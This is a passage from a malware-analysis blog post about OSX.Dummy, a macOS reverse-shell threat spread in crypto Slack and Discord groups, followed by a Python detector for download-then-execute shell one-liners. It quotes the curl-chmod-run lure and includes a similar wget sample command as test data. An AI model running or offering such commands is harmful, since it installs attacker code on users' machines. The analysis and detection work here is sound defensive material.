Objective-See: products, malware, blog

OSX.Dummy: new mac malware targets the cryptocurrency community
06/29/2018

Early today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS' 'InfoSec Handlers Diary Blog'. Titled "Crypto community target of MacOS malware", he noted:

"Previous days we've seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary."

His great writeup notes the initial infection vector and provides an overview of the malware, including its method of persistence (launch daemon) and purpose (reverse shell). Here, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this new threat, at every step of the way!

Want to play along? 👾☠️ I've shared the malware, which can be downloaded here (password: infect3d).

Remco Verhoef states the malware attacks are:

"originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary. Apparently attackers are asking users to infect themselves, via the following command:"

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

If users fall for this (rather lame) social engineering trick, a rather massive Mach-O binary will be downloaded and executed. Massive you say? Yes, it clocks in at 34M:

$ du -h /tmp/script
34M script

Using WhatsYourSign, we can see that the malicious binary is not signed.

Source: https://objective-see.com/blog/blog_0x32.html
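The lure above has a recognisable shape regardless of the URL or file name: fetch a file into a temp directory, mark it executable, run it. As an added example (not from the post, and not one of Objective-See's tools), here is a small Python checker that takes a one-line shell command, as it might appear in shell history or a command-line audit log, and reports whether the same fetch / chmod / execute chain is present. The sample command lines are constructed here; the first mirrors the lure quoted in the post, the others are made-up benign and malicious comparison cases.

```python
import os
import re
import shlex

# Constructed sample command lines: the first mirrors the lure quoted in the
# post, the rest are invented here as benign and malicious comparison cases.
SAMPLE_COMMANDS = [
    "cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script",
    "cd /tmp && wget -qO payload http://example.invalid/p && chmod 755 payload && ./payload",
    "curl -s https://example.invalid/notes.txt > /tmp/notes.txt",
    "chmod +x build.sh && ./build.sh",
    "ls -la /tmp",
]

DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh"}


def split_segments(cmdline):
    """Split a one-liner on the shell list operators (&&, ||, ;)."""
    return [s.strip() for s in re.split(r"&&|\|\||;", cmdline) if s.strip()]


def tokens(segment):
    """Tokenise one simple command; fall back to whitespace on unbalanced quotes."""
    try:
        return shlex.split(segment)
    except ValueError:
        return segment.split()


def download_target(toks):
    """File a curl/wget invocation writes to, via '>' redirection or -o/-O/--output."""
    for i, t in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else None
        if t == ">" and nxt:
            return nxt
        if t in ("-o", "-O", "--output") and nxt:
            return nxt
        if t.startswith("--output="):
            return t.split("=", 1)[1]
        if re.fullmatch(r"-[a-zA-Z]*O", t) and nxt:  # combined flags, e.g. wget -qO file
            return nxt
    return None


def grants_exec(mode):
    """True if a chmod mode string adds an execute bit (octal or symbolic)."""
    if mode.isdigit():
        return bool(int(mode[-3:], 8) & 0o111)
    return re.search(r"[+=][rwxXst]*[xX]", mode) is not None


def analyze(cmdline):
    """Track the three stages of the lure: fetch a file, mark it executable, run it."""
    downloaded, made_exec, executed = set(), set(), set()
    in_tmp = False
    for seg in split_segments(cmdline):
        toks = tokens(seg)
        if not toks:
            continue
        cmd = toks[0]
        if cmd == "cd" and len(toks) > 1 and toks[1].startswith("/tmp"):
            in_tmp = True
        elif cmd in DOWNLOADERS:
            target = download_target(toks)
            if target:
                downloaded.add(os.path.basename(target))
                if target.startswith("/tmp"):
                    in_tmp = True
        elif cmd == "chmod" and len(toks) > 2 and grants_exec(toks[1]):
            made_exec.update(os.path.basename(f) for f in toks[2:])
        elif cmd.startswith(("./", "/")):
            executed.add(os.path.basename(cmd))
        elif cmd in INTERPRETERS and len(toks) > 1:
            executed.add(os.path.basename(toks[-1]))
    # A file that is both fetched and executed in the same line is the core signal;
    # chmod +x and a /tmp drop location strengthen it.
    chain = downloaded & executed
    return {
        "suspicious": bool(chain),
        "artifacts": sorted(chain),
        "chmod_exec": bool(chain & made_exec),
        "in_tmp": in_tmp,
    }


def flagged(commands):
    """Return (command, analysis) pairs for every line that shows the chain."""
    results = [(c, analyze(c)) for c in commands]
    return [(c, r) for c, r in results if r["suspicious"]]


if __name__ == "__main__":
    for cmd, result in flagged(SAMPLE_COMMANDS):
        print(f"FLAGGED {result['artifacts']} chmod={result['chmod_exec']} tmp={result['in_tmp']}: {cmd}")
```

The checker matches on the basename of the dropped file, so `curl ... > script` followed by `./script` is tied together even though the two segments spell the path differently; a plain download into /tmp (the third sample) or a local build script that is never fetched (the fourth) is not flagged, which keeps the rule from firing on ordinary developer activity.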